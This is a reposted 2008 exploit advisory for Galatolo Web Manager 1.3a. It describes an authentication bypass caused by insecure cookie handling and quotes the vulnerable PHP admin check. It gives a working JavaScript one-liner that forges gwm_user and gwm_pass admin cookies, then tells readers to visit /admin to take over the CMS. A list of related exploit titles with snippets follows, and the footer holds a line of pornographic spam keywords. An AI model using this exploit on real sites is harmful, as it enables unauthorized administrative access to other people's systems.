Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

互聯(lián)網(wǎng) 發(fā)布時(shí)間：2008-10-08 21:03:28 作者：佚名

############################################################################################ # # # ...:::::Galatolo Web Manager 1.3a Insecure Cook

############################################################################################
# #
# ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::.... #
############################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:
Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
logged in as a legit admin.
---
vuln code in /Admin/index.php:

if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
top();
menu();
echo $wellcome_admin;
foot();
}

---
exploit:
javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
-----
now visit /admin and you can get admin access and manage the cms ;)
-------
young iranian h4ck3rz

相關(guān)文章

終端技巧終端機(jī)常見(jiàn)繞過(guò)沙盤(pán)方法
昨晚跟@Sunshine 請(qǐng)教了下終端機(jī)的玩法，順便翻了翻資料。總結(jié)了以下的幾種方法
2013-06-19
Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
--== ========================================================= ==-- --== Wizi Wiki Wig Local File Inclusion Vulnerability ==-- --== =============
2008-10-08
File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
| File Store PRO 3.2 Blind SQL Injection | |________________________________________| Download from: http://upoint.info/cgi/demo/fs/filestore.zip
2008-10-08
Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerabi
##################################################################### # # Facebook Newsroom Application Remote File Inclusion Vulnerability # ######
2008-10-08
DreamNews Manager (id) Remote SQL Injection Vulnerability
######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #================================
2008-10-08
gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
###################################################################################################### gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulner
2008-10-08
phpDatingClub (website.php page) Local File Inclusion Vulnerabilit
######################################################### # # phpDatingClub Local File Include Vulnerability #=====================================
2008-10-08
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Expl
<html> <body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target /> </object> <script language=javascript
2008-10-08
Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
<?php /* . vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit . download: http://www.quicksilverforums.com/ . . author: irk4z[
2008-10-08
IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
/** ** ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit. ** ** Based on exploit by Koshi (written in Perl). This one should be
2008-10-08

欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

相關(guān)文章

最新評(píng)論

文章分類

大家感興趣的內(nèi)容

最近更新的內(nèi)容